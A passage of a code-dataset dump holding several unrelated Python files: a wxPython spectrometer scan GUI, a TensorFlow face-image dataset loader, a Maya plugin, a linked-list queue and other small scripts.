numbers)\n\t\tself.MovingStageX = ManagerThorlabsAPTMovingStage(83843642)\n\t\tself.MovingStageXProc = self.MovingStageX.start()\n\t\t\t\t\n\t\tself.MovingStageY = ManagerThorlabsAPTMovingStage(83843641)\n\t\tself.MovingStageYProc = self.MovingStageY.start()\n\n\t\t# Create GUI\n\t\tdw, dh = wx.DisplaySize()\n\t\twx.Frame.__init__ (self, parent, title=\"Surface control experiment\", size=(0.9*dw, 0.88*dh) )\n\t\t\n\t\tself.ConstructGUI ()\n\t\tself.Center()\n\t\tself.Show ()\n\t\twx.EVT_CLOSE (self, self.on_close)\n\t\n\tdef on_close (self, event):\n\t\t\"\"\"\n\t\tWindows is about to be closed. Stop all timers.\n\t\t\"\"\"\n\t\tself.StopAllJobs ()\n\t\tself.Destroy ()\t\n\t\n\tdef ConstructGUI (self) :\n\t\t\"\"\" Build GUI \"\"\"\n\t\tself.panel = wx.Panel(self)\n\t\tsizer = wx.GridBagSizer ()\n\t\t\n\t\t############################ Settings Notebook ############################\n\t\tself.SettingsNotebook = SettingsNotebook(self.panel)\n\t\tsizer.Add(self.SettingsNotebook, pos=(0, 0), span=(1, 1), flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)\n\n\t\t############################ Command panel ############################\n\t\tboxsizer = wx.BoxSizer (wx.VERTICAL)\n\t\t\n\t\t# Test button\n\t\ttest_button = wx.Button (self.panel, label=\"Test\") \n\t\t\n\t\tdef OnTestButton (event) :\n\t\t\tself.PulseShaper.Initialize( self.SettingsNotebook.PulseShaper.GetSettings() )\n\t\t\tself.PulseShaper.Test()\n\t\t\t\n\t\tself.Bind (wx.EVT_BUTTON, OnTestButton, test_button)\n\t\tboxsizer.Add (test_button, flag=wx.EXPAND|wx.TOP, border=5)\n\t\t\n\t\t# Interactively display spectrum\n\t\tself.show_spectrum_button = wx.Button (self.panel)\n\t\tself.show_spectrum_button.__start_label__ = \"Show spectrum\"\n\t\tself.show_spectrum_button.__stop_label__ = \"STOP measuring spectrum\"\n\t\tself.show_spectrum_button.SetLabel (self.show_spectrum_button.__start_label__)\n\t\tself.Bind (wx.EVT_BUTTON, self.MeasureSingleSpectrum, self.show_spectrum_button)\n\t\t#self.show_spectrum_button.Bind(wx.EVT_BUTTON, self.MeasureSingleSpectrum)\n\t\tboxsizer.Add (self.show_spectrum_button, flag=wx.EXPAND, border=5)\n\t\t\n\t\t################## Rectangular scan button ##################\n\t\tself.rectangular_scan_button = wx.Button (self.panel)\n\t\tself.rectangular_scan_button.Bind (wx.EVT_LEFT_DOWN, self.PerformMeasurments)\n\t\tself.rectangular_scan_button.Bind (wx.EVT_LEFT_DCLICK, self.PerformMeasurments)\n\t\tboxsizer.Add(self.rectangular_scan_button, flag=wx.EXPAND, border=5)\n\t\t# Define labels\n\t\tself.rectangular_scan_button.__start_label__ \t= \"Rectangular scan\"\n\t\tself.rectangular_scan_button.__pause_label__ \t= \"PAUSE scan\"\n\t\tself.rectangular_scan_button.__resume_label__\t= \"RESUME scan\"\n\t\tself.rectangular_scan_button.__stop_label__ \t= \"STOP scan\"\n\t\tself.rectangular_scan_button.SetLabel (self.rectangular_scan_button.__start_label__)\n\t\t# Specify the measurements settings\n\t\tself.rectangular_scan_button.__measurmenet_manager__ \t\t= ManagerRectangularScan\n\t\tself.rectangular_scan_button.__measurmenet_manager_args__\t= (self.Spectrometer, self.MovingStageX, self.MovingStageY)\n\t\tself.rectangular_scan_button.__tab_settings__\t\t\t\t= \"RectangularScan\"\n\t\t#self.rectangular_scan_button.__post_process__ = self.RectangularScanPostProcess \n\t\t\n\t\t# Save settings\n\t\tself.save_settings_button = wx.Button (self.panel, label=\"Save settings...\")\n\t\tself.Bind (wx.EVT_BUTTON, self.SaveSettings, self.save_settings_button)\n\t\tboxsizer.Add(self.save_settings_button, flag=wx.EXPAND|wx.TOP, border=5)\n\t\t\n\t\t# Load settings\n\t\tself.load_settings_button = wx.Button (self.panel, label=\"Load settings...\")\n\t\tself.Bind (wx.EVT_BUTTON, self.LoadSettings, self.load_settings_button)\n\t\tboxsizer.Add(self.load_settings_button, flag=wx.EXPAND|wx.TOP, border=5)\n\t\t\n\t\tsizer.Add(boxsizer, pos=(1, 0), span=(1, 1), flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)\n\t\t########################### End of constructing panel ######################################\n\t\tself.panel.SetSizer (sizer)\n\t\t\n\t\t############################# Setting visvis #######################################\n\t\tFigure = app.GetFigureClass()\n\t\tself.fig = Figure(self)\n\t\t\n\t\tboxsizer = wx.BoxSizer (wx.HORIZONTAL)\n\t\tboxsizer.Add(self.panel, 1, wx.EXPAND)\n\t\tboxsizer.Add(self.fig._widget, 2, wx.EXPAND)\n\n\t\tself.SetSizer (boxsizer)\n\t\tself.SetAutoLayout(True)\n\t\tself.Layout() \t\n\t\t\n\tdef __del__ (self) :\t\n\t\t# Close moving stages\n\t\tself.MovingStageX.exit(); self.MovingStageXProc.join()\n\t\tself.MovingStageY.exit(); self.MovingStageYProc.join()\n\t\t\n\t\t# Close spectrometer\n\t\tself.Spectrometer.exit(); self.SpectrometerProc.join() \n\t\t\n\t\t# Close pulse shaper\n\t\tself.PulseShaper.exit(); self.PulseShaperProc.join()\n\t\t\n\tdef PerformMeasurments (self, event) :\n\t\t\"\"\"\n\t\tA universal wrapper for performing measurements\n\t\t\"\"\"\n\t\t# Extracting which button was clicked\n\t\ttry :\n\t\t\tbutton = event.GetEventObject()\n\t\t\t# Mouse double clicking stops scanning\n\t\t\tif event.GetEventType() == wx.wxEVT_LEFT_DCLICK  : button.SetLabel (button.__stop_label__)\n\t\texcept AttributeError : button = event\n\n\t\tif button.GetLabel() == button.__start_label__ :\n\t\t\tself.StopAllJobs ()\n\t\t\t\n\t\t\t# get spectrometer's settings\n\t\t\tsettings = self.SettingsNotebook.Spectrometer.GetSettings()\n\t\t\t# Initiate spectrometer\n\t\t\tif self.Spectrometer.SetSettings(settings) == RETURN_FAIL : return\n\t\t\t\n\t\t\t# Extract the measurements settings \n\t\t\ttab = self.SettingsNotebook.settings_to_tabs[button.__tab_settings__]\n\t\t\tsettings = tab.GetSettings()\n\t\t\tif \"filename\" not in settings : settings[\"filename\"] = \"results.hdf5\"\n\t\t\t\n\t\t\t# Save the global settings\n\t\t\tresult = self.SaveSettings( default_filename=settings[\"filename\"], title=button.__start_label__)\n\t\t\tif not isinstance(result, basestring) : \n\t\t\t\t# User did not chose the file name\n\t\t\t\treturn\n\t\t\t\n\t\t\tif settings[\"filename\"] != result :\n\t\t\t\t# Update the file name if user chosen different\n\t\t\t\tsettings[\"filename\"] = result\n\t\t\t\ttab.SetSettings (settings)\n\t\t\t\n\t\t\t# Saving the filename for postprocesing \n\t\t\tbutton.__results_filename__ = result\n\t\t\t\n\t\t\t# Start scanning via the corresponding manager\n\t\t\tbutton.__running_manager__ = button.__measurmenet_manager__(settings, *button.__measurmenet_manager_args__)\n\t\t\t\n\t\t\t# Start timer to monitor weather measurement is over\n\t\t\tTIMER_ID = wx.NewId()\n\t\t\tbutton.__scanning_timer__ = wx.Timer (self, TIMER_ID)\n\t\t\tbutton.__scanning_timer__.Start (2000) # check every 2 seconds\n\t\t\t\n\t\t\tdef check_weather_scanning_finished (event) : \n\t\t\t\tif not button.__running_manager__.is_running () : \n\t\t\t\t\tbutton.SetLabel (button.__stop_label__); self.PerformMeasurments (button)\n\t\t\t\n\t\t\twx.EVT_TIMER (self, TIMER_ID, check_weather_scanning_finished)\n\t\t\t\n\t\t\t# Changing the button's label \n\t\t\tbutton.SetLabel (button.__pause_label__)\n\t\t\t\n\t\telif button.GetLabel() == button.__pause_label__ :\n\t\t\tbutton.__running_manager__.pause(); button.SetLabel (button.__resume_label__)\n\t\t\t\n\t\telif button.GetLabel() == button.__resume_label__ :\n\t\t\tbutton.__running_manager__.resume(); button.SetLabel (button.__pause_label__)\n\t\t\t\n\t\telif button.GetLabel() == button.__stop_label__ :\n\t\t\t# Stop timer\n\t\t\tbutton.__scanning_timer__.Stop()\n\t\t\tdel button.__scanning_timer__\n\t\t\t# Stop measurements\n\t\t\tbutton.__running_manager__.stop(); \n\t\t\tdel button.__running_manager__\n\t\t\tbutton.SetLabel (button.__start_label__)\n\t\t\t\n\t\t\ttry : # Start post processing, if present\n\t\t\t\tbutton.__post_process__(button.__results_filename__)\n\t\t\texcept AttributeError : pass\n\t\t\t\n\t\telse : raise ValueError (\"Unrecognised button label\")\n\t\t\n\tdef StopAllJobs (self) :\n\t\t\"\"\"\n\t\tStop  tasks \n\t\t\"\"\"\n\t\tfor control in self.panel.GetChildren() :\n\t\t\ttry :\n\t\t\t\tif isinstance(control, wx.Button) and control.GetLabel() != control.__start_label__ :\n\t\t\t\t\tcontrol.SetLabel (control.__stop_label__)\n\t\t\t\t\tcontrol.GetEventHandler().ProcessEvent(wx.PyCommandEvent(wx.EVT_BUTTON.typeId, control.GetId()))\n\t\t\texcept AttributeError : pass\n\t\t\n\tdef MeasureSingleSpectrum (self, event=None) :\n\t\t\"\"\"\n\t\tButton  was clicked\n\t\t\"\"\"\n\t\tbutton = self.show_spectrum_button\n\t\t\n\t\tif button.GetLabel() == button.__start_label__ :\n\t\t\tself.StopAllJobs()\n\t\t\t# get spectrometer's settings\n\t\t\tspect_settings = self.SettingsNotebook.Spectrometer.GetSettings()\n\t\t\t\n\t\t\t# Initiate spectrometer\n\t\t\tif self.Spectrometer.SetSettings(spect_settings) == RETURN_FAIL : return\n\t\t\tself.wavelengths = self.Spectrometer.GetWavelengths()\n\t\t\t\n\t\t\t# Clearing the figure\n\t\t\tvisvis.clf()\n\t\t\n\t\t\tdef draw_spectrum (event) :\n\t\t\t\t\"\"\"Timer function \"\"\"\n\t\t\t\tspectrum = self.Spectrometer.AcquiredData() \n\t\t\t\tif spectrum == RETURN_FAIL : return\n\t\t\t\t# Display the spectrum\n\t\t\t\t\n\t\t\t\t############### Take the log of spectrum ##########\n\t\t\t\t#spectrum = spectrum / float(spectrum.max())\n\t\t\t\t#np.log10(spectrum, out=spectrum)\n\t\t\t\t##############################\n\t\t\t\t\n\t\t\t\tax = visvis.gca()\n\t\t\t\tax.Clear()\t\n\t\t\t\tvisvis.plot (self.wavelengths, spectrum)\n\t\t\t\tvisvis.xlabel(\"wavelength (nm)\")\n\t\t\t\tvisvis.ylabel(\"counts\")\n\t\t\t\t\n\t\t\t\t# Display the current temperature\n\t\t\t\tvisvis.title (\"Temperature %d (C)\" % self.Spectrometer.GetTemperature() )\n\t\t\t\t\n\t\t\t# Set up timer to draw spectrum\n\t\t\tTIMER_ID = wx.NewId()\n\t\t\tself.spectrum_timer =  wx.Timer (self, TIMER_ID)\n\t\t\tself.spectrum_timer.Start (spect_settings[\"exposure_time\"])\n\t\t\t\n\t\t\t# Change button's label\n\t\t\tbutton.SetLabel (button.__stop_label__)\n\t\t\twx.EVT_TIMER (self, TIMER_ID, draw_spectrum)\n\t\t\t\n\t\telif button.GetLabel() == button.__stop_label__ :\n\t\t\t# Stopping timer\n\t\t\tself.spectrum_timer.Stop()\n\t\t\tdel self.spectrum_timer\n\t\t\t# Change button's label\n\t\t\tbutton.SetLabel (button.__start_label__) \n\t\t\t\n\t\telse : raise ValueError(\"Label is not recognized\") \n\t\t\n\tdef SaveSettings (self, event=None, default_filename = \"settings.hdf5\", title=\"Open HDF5 file to save settings\" ) :\n\t\t\"\"\"\n\t\tButton  was clicked\n\t\t\"\"\"\n\t\topenFileDialog = wx.FileDialog(self, title, \"\", default_filename, \"HDF5 files (*.hdf5)|*.hdf5\", \n\t\t\t\t\t\t\twx.FD_SAVE | wx.FD_OVERWRITE_PROMPT | wx.FD_CHANGE_DIR)\n\t\t# Check whether user cancelled\n\t\tif openFileDialog.ShowModal() == wx.ID_CANCEL: return None\t\n\t\t\n\t\twith h5py.File (openFileDialog.GetPath(), 'w') as file_settings :\n\t\t\t# create general settings \n\t\t\tparameters_grp = file_settings.create_group(\"settings\")\n\t\t\t# Loop over all settings tab\n\t\t\tfor SettingsTabName, SettingsTab in self.SettingsNotebook.settings_to_tabs.items() :\n\t\t\t\t# Save all settings on a given tab\n\t\t\t\tgrp = parameters_grp.create_group(SettingsTabName)\n\t\t\t\tfor key, value in SettingsTab.GetSettings().items() : grp[key] = value\n\t\t\n\t\t# return valid filename\n\t\treturn openFileDialog.GetPath()\n\t\t\n\tdef LoadSettings (self, event) :\n\t\t\"\"\"\n\t\tButton  was clicked. This method is closely related to \n\t\t\"\"\"\n\t\topenFileDialog = wx.FileDialog(self, \"Open HDF5 file to load settings\", \"\", \"\",\n                                       \"HDF5 files (*.hdf5)|*.hdf5\", wx.FD_OPEN | wx.FD_FILE_MUST_EXIST | wx.FD_CHANGE_DIR)\n\t\t# Check whether user canceled\n\t\tif openFileDialog.ShowModal() == wx.ID_CANCEL: return\t\n\t\t\n\t\tself.StopAllJobs()\n\t\t\n\t\twith h5py.File (openFileDialog.GetPath(), 'r') as file_settings :\n\t\t\tfor SettingsTabName, SettingsTab in file_settings[\"settings\"].items() :\n\t\t\t\tself.SettingsNotebook.settings_to_tabs[SettingsTabName].SetSettings(SettingsTab)\n\t\t\n\t\t\n#########################################################################\nif __name__ == '__main__' :\n\tmultiprocessing.freeze_support()\n\tapp = visvis.use('wx')\n\tapp.Create()\n\tSurfaceControlExperiment (None)\n\tapp.Run()\n","sub_path":"projetcs/Surface Control/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"577911320","text":"import time\r\nimport webbrowser\r\n\r\nnew = 2\r\nurl = \"https://www.youtube.com/watch?v=Z6qnRS36EgE\"\r\ntotal_breaks = 3\r\nbreak_count = 0\r\n\r\nprint (\"This program started on\" + time.ctime())\r\nwhile (break_count < total_breaks) :\r\n    time.sleep(10)\r\n    webbrowser.open(url, new=new)\r\n    break_count = break_count + 1\r\n","sub_path":"python 실습 코드/1. webbrowser_module/break_time.py","file_name":"break_time.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"184127013","text":"import threading\nimport time\n\ndef job(a):\n    name = threading.current_thread().name\n    print(\"%s: %d\" % (name, a))\n    time.sleep(1)\n\nthreads = []\nfor i in range(5):\n    threads.append(threading.Thread(target=job, args=(i,)))\n\nfor t in threads:\n    t.start()\n","sub_path":"yuanta_python3-master/lesson13/Demo3_append.py","file_name":"Demo3_append.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"33311350","text":"# coding=utf8\nimport maya.cmds as cmds\nimport maya.OpenMaya as om\nimport maya.OpenMayaMPx as OpenMayaMPx\nimport sys\nimport main_func\nreload(main_func)\n\nclass_name = 'render_tool'\n\n\nclass Creat(OpenMayaMPx.MPxCommand):\n    menu_name = 'render tool'\n    cmds.menu(menu_name, label=menu_name, tearOff=True, parent='MayaWindow')\n    command = 'import maya.cmds as cmds;from main_func import window;window()'\n    cmds.menuItem(label='render', command=command)\n\n    def __init__(self):\n        OpenMayaMPx.MPxCommand.__init__(self)\n\n    def doIt(self, argList):\n        pass\n\n\ndef cmdCreator():\n    return OpenMayaMPx.asMPxPtr(Creat())\n\n\ndef initializePlugin(mobject):\n    mplugin = OpenMayaMPx.MFnPlugin(mobject)\n    try:\n        mplugin.registerCommand(class_name, cmdCreator)\n    except:\n        sys.stderr.write('Failed to register command' + class_name)\n\n\ndef uninitializePlugin(mobject):\n    if cmds.menu('render_tool', exists=True):\n        cmds.deleteUI('render_tool', menu=True)\n    mplugin = OpenMayaMPx.MFnPlugin(mobject)\n    try:\n        mplugin.deregisterCommand(class_name)\n    except:\n        sys.stderr.write('Failed to deregister command' + class_name)\n","sub_path":"arnold_renderer/render_plug.py","file_name":"render_plug.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"143427481","text":"import os\nimport glob2\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\n# /datasets/faces_emore_112x112_folders/*/*.jpg'\ndefault_image_names_reg = \"*/*.jpg\"\ndefault_image_classes_rule = lambda path: int(os.path.basename(os.path.dirname(path)))\n\n\ndef pre_process_folder(data_path, image_names_reg=None, image_classes_rule=None):\n    if not os.path.exists(data_path):\n        return np.array([]), np.array([]), 0\n    while data_path.endswith(\"/\"):\n        data_path = data_path[:-1]\n    dest_pickle = os.path.join(\"./\", os.path.basename(data_path) + \"_shuffle.pkl\")\n    if os.path.exists(dest_pickle):\n        with open(dest_pickle, \"rb\") as ff:\n            aa = pickle.load(ff)\n        image_names, image_classes = aa[\"image_names\"], aa[\"image_classes\"]\n    else:\n        if image_names_reg is None or image_classes_rule is None:\n            image_names_reg, image_classes_rule = default_image_names_reg, default_image_classes_rule\n        image_names = glob2.glob(os.path.join(data_path, image_names_reg))\n        image_names = np.random.permutation(image_names).tolist()\n        image_classes = [image_classes_rule(ii) for ii in image_names]\n        with open(dest_pickle, \"wb\") as ff:\n            pickle.dump({\"image_names\": image_names, \"image_classes\": image_classes}, ff)\n    classes = np.max(image_classes) + 1\n    return image_names, image_classes, classes\n\n\ndef read_image(file_path, label, classes=0, one_hot_label=True):\n    if one_hot_label:\n        label = tf.one_hot(label, depth=classes, dtype=tf.int32)\n    img = tf.io.read_file(file_path)\n    img = tf.image.decode_jpeg(img, channels=3)\n    img = tf.image.convert_image_dtype(img, tf.float32)\n    return img, label\n\n\ndef random_process_image(img, label, img_shape=(112, 112), random_status=2, random_crop=None):\n    img = tf.image.random_flip_left_right(img)\n    if random_status >= 1:\n        img = tf.image.random_brightness(img, 0.1 * random_status)\n    if random_status >= 2:\n        img = tf.image.random_contrast(img, 1 - 0.1 * random_status, 1 + 0.1 * random_status)\n        img = tf.image.random_saturation(img, 1 - 0.1 * random_status, 1 + 0.1 * random_status)\n    if random_crop is not None:\n        img = tf.image.random_crop(img, random_crop)\n        img = tf.image.resize(img, img_shape)\n    img = (tf.clip_by_value(img, 0.0, 1.0) - 0.5) * 2\n    return img, label\n\n\ndef prepare_dataset(\n    data_path,\n    image_names_reg=None,\n    image_classes_rule=None,\n    batch_size=128,\n    img_shape=(112, 112),\n    random_status=2,\n    random_crop=None,\n    cache=False,\n    shuffle_buffer_size=None,\n    is_train=True,\n):\n    image_names, image_classes, classes = pre_process_folder(data_path, image_names_reg, image_classes_rule)\n    if len(image_names) == 0:\n        return None, 0\n    print(\">>>> Image length: %d, Image class length: %d, classes: %d\" % (len(image_names), len(image_classes), classes))\n\n    AUTOTUNE = tf.data.experimental.AUTOTUNE\n    ds = tf.data.Dataset.from_tensor_slices((image_names, image_classes))\n    # ds = ds.repeat()\n    ds = ds.shuffle(buffer_size=len(image_names))\n    ds = ds.map(lambda xx, yy: read_image(xx, yy, classes), num_parallel_calls=AUTOTUNE)\n    # ds = ds.prefetch(buffer_size=AUTOTUNE)\n    if cache:\n        ds = ds.cache(cache) if isinstance(cache, str) else ds.cache()\n\n    if is_train:\n        process_func = lambda xx, yy: random_process_image(xx, yy, img_shape, random_status, random_crop)\n    else:\n        process_func = lambda xx, yy: ((xx - 0.5) * 2, yy)\n    ds = ds.map(process_func, num_parallel_calls=AUTOTUNE)\n    ds = ds.batch(batch_size)  # Use batch --> map has slightly effect on dataset reading time, but harm the randomness\n    ds = ds.prefetch(buffer_size=AUTOTUNE)\n    # ds = ds.prefetch(buffer_size=1000)\n    # steps_per_epoch = np.ceil(len(image_names) / batch_size)\n    # return ds, steps_per_epoch, classes\n    return ds\n\n\nclass Triplet_dataset:\n    def __init__(\n        self,\n        data_path,\n        image_names_reg=None,\n        image_classes_rule=None,\n        batch_size=48,\n        image_per_class=4,\n        img_shape=(112, 112, 3),\n        random_status=3,\n        random_crop=None,\n    ):\n        self.AUTOTUNE = tf.data.experimental.AUTOTUNE\n        image_names, image_classes, classes = pre_process_folder(data_path, image_names_reg, image_classes_rule)\n        image_dataframe = pd.DataFrame({\"image_names\": image_names, \"image_classes\": image_classes})\n        image_dataframe = image_dataframe.groupby(\"image_classes\").apply(lambda xx: xx.image_names.values)\n        aa = image_dataframe.map(len)\n        self.image_dataframe = image_dataframe[aa > image_per_class]\n        self.split_func = lambda xx: np.array(\n            np.split(np.random.permutation(xx)[: len(xx) // image_per_class * image_per_class], len(xx) // image_per_class)\n        )\n        self.image_per_class = image_per_class\n        self.batch_size = batch_size\n        self.img_shape = img_shape[:2]\n        self.channels = img_shape[2] if len(img_shape) > 2 else 3\n        print(\"The final train_dataset batch will be %s\" % ([batch_size * image_per_class, *self.img_shape, self.channels]))\n\n        self.get_label = lambda xx: tf.cast(tf.strings.to_number(tf.strings.split(xx, os.path.sep)[-2]), tf.int32)\n        self.process_path = lambda img_name: random_process_image(\n            *read_image(img_name, label=self.get_label(img_name), classes=classes), self.img_shape, random_status, random_crop\n        )\n        # image_data = self.image_data_shuffle()\n        # self.steps_per_epoch = np.ceil(image_data.shape[0] / self.batch_size)\n\n        train_dataset = tf.data.Dataset.from_generator(\n            self.image_data_shuffle_gen, output_types=tf.string, output_shapes=(image_per_class,)\n        )\n        # train_dataset = train_dataset.shuffle(total)\n        train_dataset = train_dataset.batch(self.batch_size)\n        train_dataset = train_dataset.map(self.process_batch_path, num_parallel_calls=self.AUTOTUNE)\n        self.train_dataset = train_dataset.prefetch(buffer_size=self.AUTOTUNE)\n        self.classes = classes\n\n    def image_data_shuffle_gen(self):\n        tf.print(\"Shuffle image data...\")\n        shuffle_dataset = self.image_dataframe.map(self.split_func)\n        image_data = np.random.permutation(np.vstack(shuffle_dataset.values))\n        return (ii for ii in image_data)\n\n    def process_batch_path(self, image_name_batch):\n        image_names = tf.reshape(image_name_batch, [-1])\n        if \"-dev\" in tf.__version__:\n            images, labels = tf.map_fn(self.process_path, image_names, fn_output_signature=(tf.float32, tf.int32))\n        else:\n            images, labels = tf.map_fn(self.process_path, image_names, dtype=(tf.float32, tf.int32))\n\n        return images, labels\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"396175748","text":"from visual import arrow, color, rate, display\r\n\r\nimport recursos.Configuracion as Conf\r\nfrom recursos.Arduino     import Arduino\r\nfrom recursos.Figuras     import Avion, Ejes\r\nfrom recursos.Matematicas import DCM\r\n\r\n# VENTANA ----------------------------------------------------------\r\nventana = display(title='TITULO', x=0, y=0, width=1250, height=1040, center=(0, 0, 0), background=color.black)\r\nventana.forward = (-2, -2, -2)\r\nventana.up = (0, 0, 2)\r\n\r\n# EJES -------------------------------------------------------------\r\nejesFijos = Ejes(color.red, color.green, color.blue)\r\n\r\narduino = Arduino(Conf.PUERTO, Conf.BAUDRATE)\r\narduino.conectar()\r\n\r\navion = Avion()\r\navion.size(4)\r\n\r\ndcm = DCM()\r\n    \r\nwhile 1:\r\n    \r\n    rate(100)\r\n    \r\n    data = arduino.getData(Conf.COD_DCM)\r\n    dcm.update(data)\r\n   \r\n    avion.axis(dcm.iG)\r\n    avion.up(dcm.kG)\r\n        \r\n","sub_path":"RealidadVirtual/src/v02_Avion/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"469964605","text":"'''\nClass that contains all solver variables\n'''\n\nclass Variables(object):\n    '''\n    indictator_routes[route, time] = {0, 1}\n    indicator_product[product, start, end, time] = {0, 1}\n    depot_volume[depot, time] = [0, \\infty)\n    location_incoming[location, time] = [0, \\infty)\n    location_outgoing[location, time] = [0, \\infty)\n    depot_overcap[depot, time] = {0, 1}\n    stoppage = {0, 1}\n    '''\n    def __init__(self):\n        self.indicator_routes = {}\n        self.indicator_product = {}\n        self.depot_volume = {}\n        self.location_incoming = {}\n        self.location_outgoing = {}\n        self.depot_overcap = {}\n        self.stoppage = 0\n        self.location_location_transfer = {}\n","sub_path":"objects/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"102459290","text":"from .. import udB\n\n\ndef str_to_list(text):  # Returns List\n    return text.split(\" \")\n\n\ndef list_to_str(list):  # Returns String\n    str = \"\"\n    for x in list:\n        str += f\"{x} \"\n    return str.strip()\n\n\ndef get_logger():  # Returns List\n    pmperm = udB.get(\"LOGUSERS\")\n    if pmperm is None or pmperm == \"\":\n        return [\"\"]\n    else:\n        return str_to_list(pmperm)\n\n\ndef is_logger(id):  # Take int or str with numbers only , Returns Boolean\n    if not str(id).isdigit():\n        return False\n    pmperm = get_logger()\n    if str(id) in pmperm:\n        return True\n    else:\n        return False\n\n\ndef log_user(id):  # Take int or str with numbers only , Returns Boolean\n    id = str(id)\n    if not id.isdigit():\n        return False\n    try:\n        pmperm = get_logger()\n        pmperm.append(id)\n        udB.set(\"LOGUSERS\", list_to_str(pmperm))\n        return True\n    except Exception as e:\n        print(f\"King-Userbot LOG : // functions/logusers_db/log_user : {e}\")\n        return False\n\n\ndef nolog_user(id):  # Take int or str with numbers only , Returns Boolean\n    id = str(id)\n    if not id.isdigit():\n        return False\n    try:\n        pmperm = get_logger()\n        pmperm.remove(id)\n        udB.set(\"LOGUSERS\", list_to_str(pmperm))\n        return True\n    except Exception as e:\n        print(f\"King-Userbot LOG : // functions/loguser_db/nolog_user : {e}\")\n        return False\n","sub_path":"pyking/functions/logusers_db.py","file_name":"logusers_db.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"243423935","text":"import imageio\nimageio.plugins.ffmpeg.download()\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport math, os\nfrom user_functions_P1 import *\n\nfolder = '../test_images'\noutputfolder = folder + '/output'\ntest_images = []\ntest_images += [each for each in os.listdir(folder) if each.endswith('.jpg') and not each.startswith('.')]\n\n\nfor test_image in test_images:\n\n    test_image_name = os.path.splitext(test_image)\n\n    img = mpimg.imread(folder+'/'+test_image)\n    img_output = process_img_p(img)\n\n    plt.figure\n    plt.imshow(img_output)\n\n    #plt.show()\n    mpimg.imsave(outputfolder + '/' + test_image_name[0] + '_out.jpg', img_output, cmap='gray')","sub_path":"codes/analyse_test_images.py","file_name":"analyse_test_images.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"505111209","text":"print (\"Pig Latin Translator\")\r\n\r\n\r\npig = \"ay\"\r\n\r\noriginal = input(\"Enter a word:\")\r\n\r\nif len(original) > 0 and original.isalpha():\r\n    word = original.lower()\r\n    first = original[0]\r\n    new_word = word + first + pig\r\n    new_word = new_word[1:]\r\n    print(new_word)\r\nelse:\r\n    print (\"empty\")\r\n","sub_path":"PigLatin.py","file_name":"PigLatin.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"205280915","text":"\nfrom random import randint\nclass Node():\n    def __init__(self, value=None):\n        self.value= value\n        self.next= None\n    def __str__(self):\n        return str(self.value)\n\nclass QueueLL():\n    def __init__(self,  values=None):\n        self.head=None\n        self.tail=None\n        \n    def __iter__(self):\n        currNode= self.head\n        while currNode:\n            yield currNode\n            currNode= currNode.next\n\n    def __str__(self):\n        values= [str(x.value) for x in self]\n        return \"\\n____\\n\".join(values)\n\n    def len_ll(self):\n        len_ll=0\n        currNode= self.head\n        while currNode:\n            len_ll+=1\n            currNode= currNode.next\n        return len_ll\n\n    def generate(self, n, max_no, min_no):\n        self.head= None\n        self.tail= None\n        for i in range(n):\n            self.add(randint(min_no, max_no))\n        return self\n\n    def isEmpty(self):\n        return self.head== None\n\n    def enq(self, value):\n        newNode= Node(value)\n        if self.head == None:\n            self.head, self.tail = newNode, newNode\n        self.tail.next= newNode\n        self.tail= newNode\n        return\n\n    def deQ(self):\n        if self.isEmpty(): return \"empty Q\"\n        else:\n            head= self.head\n            self.head= self.head.next\n            return head\n\n    def peek(self):\n        if self.isEmpty(): \"stack is empty\"\n        else: return self.head.value\n\n    def delete(self):\n        self.head= None\n \nll= QueueLL(10)\nll.enq(1)\nll.enq(2)\nll.enq(3)\nll.enq(4)\nprint(ll)\nll.deQ()\nprint(\"after deQing\",ll)","sub_path":"stack_Queue/queue_ll.py","file_name":"queue_ll.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
